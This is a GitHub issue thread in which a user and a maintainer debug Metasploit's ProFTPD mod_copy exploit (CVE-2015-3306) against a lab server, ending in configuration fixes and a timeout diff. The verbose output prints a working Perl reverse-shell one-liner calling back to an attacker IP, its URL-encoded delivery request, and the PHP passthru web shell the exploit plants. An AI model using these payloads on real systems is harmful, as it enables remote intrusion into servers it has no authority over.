### ISSUE TITLE
proftpd_modexec_copy reverse shell payload doesn't work

### ISSUE THREAD

**Issue by Florablia** [rapid7/metasploit-framework#17569]
## Steps to reproduce

1. set up a vulnerable proftpd server run by "nobody", configured with module mod_copy.c, and a website with a folder writable by same "nobody" user (here a test folder in /var/www/html)
2. launch metasploit exploit proftpd_modexec_copy, with payload cmd/unix/reverse_perl

Victim operating system is debiand 10. Proftpd version is 1.3.5.
Metasploit version is 5.0.99-dev, launch on kali

## Were you following a specific guide/tutorial or reading documentation?

follow:
https://eromang.zataz.com/2016/02/23/cve-2015-3306-proftpd-1-3-5-mod_copy-command-execution/

## Expected behavior

The exploit should create a php file in the writable web folder (/var/www/html/test) and launch the payload in it to obtain a reverse shell (and thus a session).

## Current behavior

A php file is indeed created in the writable web folder, but its content doesn't seem right at all.  
the filename is somewhat random, last test was UZd0co8.php
content of the file is: 
proftpd: kali_IP:45561: SITE CPTO /tmp/.<?php passthru($_GET['l4MKLMl']);?>

additionnally, a filed named '.<?php passthru($_GET['l4MKLMl']);?>' is created in the /tmp directory, with the same content. 

The file is accessible from the website, but as a file to download, not a php page (obviously).

Note that a "check" command confirm that the proftpd serveur is vulnerable (as does the fact that the files are indeed created)

### Metasploit version

5.0.99-dev

## Additional Information
Debug output: 

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/unix/ftp/proftpd_modcopy_exec

[unix/ftp/proftpd_modcopy_exec]
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=192.168.103.4
RPORT=80
SSL=false
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
VHOST=
UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HttpUsername=
HttpPassword=
HttpRawHeaders=
DigestAuthIIS=true
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpPartialResponses=false
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
RPORT_FTP=21
TARGETURI=/test/
TMPPATH=/tmp
SITEPATH=/var/www/html/test
payload=cmd/unix/reverse_perl
LHOST=kali_IP
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
CreateSession=true
InitialAutoRunScript=
AutoRunScript=
CommandShellCleanupCommand=
```

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
189    set loglevel 3
190    set payload /cmd/unix/reverse_perl
191    show payloads
192    search proftpd
193    use 5
194    show payloads
195    set payload cmd/unix/reverse_perl
196    options
197    set SITEPATH /var/www/html/test
198    set TARGETURI /test/
199    set RHOSTS 192.168.103.4
200    set LHOST kali_IP
201    run
202    debug
```

</details>

##  Errors

The following errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[01/30/2023 18:56:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/30/2023 18:56:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/30/2023 19:44:54] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/30/2023 19:44:54] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/30/2023 19:44:54] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/30/2023 19:44:54] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/30/2023 19:45:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/30/2023 19:45:08] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/30/2023 19:45:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/30/2023 19:45:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
```

</details>

##  Logs

The following logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ruby_ssl with unix/ftp/proftpd_modcopy_exec]: gawk to ruby
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ruby_ssl with unix/ftp/proftpd_modcopy_exec]: python to ruby
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ruby_ssl with unix/ftp/proftpd_modcopy_exec]: perl to ruby
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_ruby_ssl is incompatible with unix/ftp/proftpd_modcopy_exec for RequiredCmd: limiter was generic gawk python perl, value was ruby
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_socat_udp with unix/ftp/proftpd_modcopy_exec]: cmd to cmd
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_socat_udp with unix/ftp/proftpd_modcopy_exec]: generic to socat
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_socat_udp with unix/ftp/proftpd_modcopy_exec]: gawk to socat
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_socat_udp with unix/ftp/proftpd_modcopy_exec]: python to socat
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_socat_udp with unix/ftp/proftpd_modcopy_exec]: perl to socat
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_socat_udp is incompatible with unix/ftp/proftpd_modcopy_exec for RequiredCmd: limiter was generic gawk python perl, value was socat
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssh with unix/ftp/proftpd_modcopy_exec]: cmd to cmd
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssh with unix/ftp/proftpd_modcopy_exec]: generic to ssh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssh with unix/ftp/proftpd_modcopy_exec]: gawk to ssh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssh with unix/ftp/proftpd_modcopy_exec]: python to ssh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssh with unix/ftp/proftpd_modcopy_exec]: perl to ssh
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_ssh is incompatible with unix/ftp/proftpd_modcopy_exec for RequiredCmd: limiter was generic gawk python perl, value was ssh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssl_double_telnet with unix/ftp/proftpd_modcopy_exec]: cmd to cmd
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssl_double_telnet with unix/ftp/proftpd_modcopy_exec]: generic to telnet
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssl_double_telnet with unix/ftp/proftpd_modcopy_exec]: gawk to telnet
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssl_double_telnet with unix/ftp/proftpd_modcopy_exec]: python to telnet
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_ssl_double_telnet with unix/ftp/proftpd_modcopy_exec]: perl to telnet
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_ssl_double_telnet is incompatible with unix/ftp/proftpd_modcopy_exec for RequiredCmd: limiter was generic gawk python perl, value was telnet
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_stub with unix/ftp/proftpd_modcopy_exec]: cmd to cmd_reverse_stub
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_stub is incompatible with unix/ftp/proftpd_modcopy_exec for PayloadType: limiter was cmd, value was cmd_reverse_stub
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_tclsh with unix/ftp/proftpd_modcopy_exec]: cmd to cmd
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_tclsh with unix/ftp/proftpd_modcopy_exec]: generic to tclsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_tclsh with unix/ftp/proftpd_modcopy_exec]: gawk to tclsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_tclsh with unix/ftp/proftpd_modcopy_exec]: python to tclsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_tclsh with unix/ftp/proftpd_modcopy_exec]: perl to tclsh
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_tclsh is incompatible with unix/ftp/proftpd_modcopy_exec for RequiredCmd: limiter was generic gawk python perl, value was tclsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_zsh with unix/ftp/proftpd_modcopy_exec]: cmd to cmd
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_zsh with unix/ftp/proftpd_modcopy_exec]: generic to zsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_zsh with unix/ftp/proftpd_modcopy_exec]: gawk to zsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_zsh with unix/ftp/proftpd_modcopy_exec]: python to zsh
[01/30/2023 19:45:34] [d(3)] core: Checking compat [cmd/unix/reverse_zsh with unix/ftp/proftpd_modcopy_exec]: perl to zsh
[01/30/2023 19:45:34] [d(1)] core: Module cmd/unix/reverse_zsh is incompatible with unix/ftp/proftpd_modcopy_exec for RequiredCmd: limiter was generic gawk python perl, value was zsh
[01/30/2023 19:45:34] [d(0)] core: Module generic/custom is incompatible with unix/ftp/proftpd_modcopy_exec for PayloadType: limiter was cmd
[01/30/2023 19:45:34] [d(0)] core: Module generic/shell_bind_tcp is incompatible with unix/ftp/proftpd_modcopy_exec for PayloadType: limiter was cmd
[01/30/2023 19:45:34] [d(0)] core: Module generic/shell_reverse_tcp is incompatible with unix/ftp/proftpd_modcopy_exec for PayloadType: limiter was cmd
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: cmd to cmd
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: generic to perl
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: gawk to perl
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: python to perl
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: perl to perl
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: reverse to reverse
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: bind to reverse
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: noconn to reverse
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: none to reverse
[01/30/2023 19:45:48] [d(3)] core: Checking compat [cmd/unix/reverse_perl with unix/ftp/proftpd_modcopy_exec]: tunnel to reverse
[01/30/2023 19:45:48] [d(1)] core: Module cmd/unix/reverse_perl is compatible with unix/ftp/proftpd_modcopy_exec
```

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 5.0.99-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x0000560fc0f08220>.
Install Method: Other - Please specify
```

</details>

**Comment by bcoles** [comment]
Setting `verbose` and `HttpTrace` will provide more verbose output which may help.

```
set verbose true
set HttpTrace true
```

What output do you get?

**Comment by Florablia** [comment]
Output with verbose & HttpTrace true: 

```
msf5 exploit(unix/ftp/proftpd_modcopy_exec) > run

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.10.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 192.168.10.1:4444 
[*] 192.168.103.4:80 - 192.168.103.4:21 - Connected to FTP server
[*] 192.168.103.4:80 - 192.168.103.4:21 - Sending copy commands to FTP server
[*] 192.168.103.4:80 - Executing PHP payload /test/5mqUE.php
####################
# Request:
####################
GET /test/5mqUE.php?DdGEkt=nohup%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3bforeach%20my%20%24key%28keys%20%25ENV%29%7bif%28%24ENV%7b%24key%7d%3d~/%28.%2a%29/%29%7b%24ENV%7b%24key%7d%3d%241%3b%7d%7d%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22192.168.10.1%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24~-%3efdopen%28%24c%2cw%29%3bwhile%28%3c%3e%29%7bif%28%24_%3d~%20/%28.%2a%29/%29%7bsystem%20%241%3b%7d%7d%3b%27%20%26 HTTP/1.1                                   
Host: 192.168.103.4                                                                                                        
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                                                             
Content-Type: application/x-www-form-urlencoded                                                                            
                                                                                                                           
                                                                                                                           
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 31 Jan 2023 09:43:29 GMT                                                                                        
Server: Apache/2.4.38 (Debian)                                                                                             
Last-Modified: Tue, 31 Jan 2023 09:43:29 GMT                                                                               
ETag: W/"50-5f38c2a094d65"                                                                                                 
Accept-Ranges: bytes                                                                                                       
Content-Length: 80                                                                                                         
                                                                                                                           
proftpd: kali_IP:43449: SITE CPTO /tmp/.<?php passthru($_GET['DdGEkt']);?>                                            
[*] Exploit completed, but no session was created.
```

**Comment by Florablia** [comment]
### EDIT
exploit working with the TEST installation of proftpd. The problem was...php was not installed on the server -_-

Still not working with the DEFAULT installation, with the "Failure retrieving banner" error.
conf file for default server is: 
```
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName			"ProFTPD Default Installation"
ServerType			standalone
DefaultServer			on

# Port 21 is the standard FTP port.
Port				21

# Don't use IPv6 support by default.
UseIPv6				off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask				022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances			30

# Set the user and group under which the server will run.
User				nobody
Group				nogroup

# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~

# Normally, we want files to be overwriteable.
AllowOverwrite		on

# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
  DenyAll
</Limit>

# A basic anonymous configuration, no upload directories.  If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
  User				ftp
  Group				ftp

  # We want clients to be able to login with "anonymous" as well as "ftp"
  UserAlias			anonymous ftp

  # Limit the maximum number of anonymous logins
  MaxClients			10

  # We want 'welcome.msg' displayed at login, and '.message' displayed
  # in each newly chdired directory.
  DisplayLogin			welcome.msg
  DisplayChdir			.message

  # Limit WRITE everywhere in the anonymous chroot
  <Limit WRITE>
    DenyAll
  </Limit>
</Anonymous>
```

**Comment by bcoles** [comment]
> Still not working with the DEFAULT installation, with the "Failure retrieving banner" error.

The banner check occurs very early in the module.

https://github.com/rapid7/metasploit-framework/blob/7bb0eca93139ee37c8f2fde68192ae7afdbcf516/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb#L100-L103

The check fails if the response from the server does not contain `220`. Perhaps taking a look at the network traffic will offer some hints.

**Comment by Florablia** [comment]
I've already tested the server response by directly connecting with ftp, it sends me back a 220 banner: 
`220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.103.4]`

But to be sure I've also checked traffic with wireshark while launching the exploit on metasploit. There's a nice little TCP syn/ack with the server, and then response from FTP: 
```
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.103.4]\r\n
Response code: Service ready for new user (220)
Response arg: ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.103.4]
```

I'll try to compare the conf files from default & test install, since the exploit is working with test install now.

**Comment by Florablia** [comment]
### Corrected
So, I've made some tests comparing the conf file from TEST installation and the one for Default installation. 
Turns out I had to use `UseReverseDNS    off` in the configuration file to make the connection faster, and so avoid the problem with the 220 banner.

Exploit is working. Issue can be closed.

**Comment by bcoles** [comment]
The second argument to `get_once` specifies the timeout. Currently 10 seconds. Changing this to 30 seconds might help.

```diff
diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
index a85ec29db1..86be8b34ad 100644
--- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
-    res = sock.get_once(-1, 10)
+    res = sock.get_once(-1, 30)
     unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
-    res = sock.get_once(-1, 10)
+    res = sock.get_once(-1, 30)
     unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
```

**Comment by bcoles** [comment]
I wasn't able to reproduce this issue on LAN. The reverse lookup failed immediately.

Regardless, I've increased the timeout for the initial socket read from 10 seconds to 30 seconds in #17789.

**Comment by bcoles** [comment]
This should be fixed in #17569.
